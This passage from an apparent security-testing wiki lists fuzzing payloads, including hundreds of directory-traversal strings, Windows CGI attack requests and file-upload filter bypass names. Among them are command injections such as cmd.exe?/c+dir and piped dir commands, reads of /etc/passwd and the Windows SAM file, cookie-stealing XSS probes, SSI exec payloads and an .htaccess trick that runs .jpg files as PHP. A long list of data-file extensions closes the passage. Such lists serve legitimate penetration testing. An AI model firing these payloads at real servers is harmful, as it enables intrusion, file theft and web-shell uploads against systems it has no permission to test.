..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2009)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2009 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
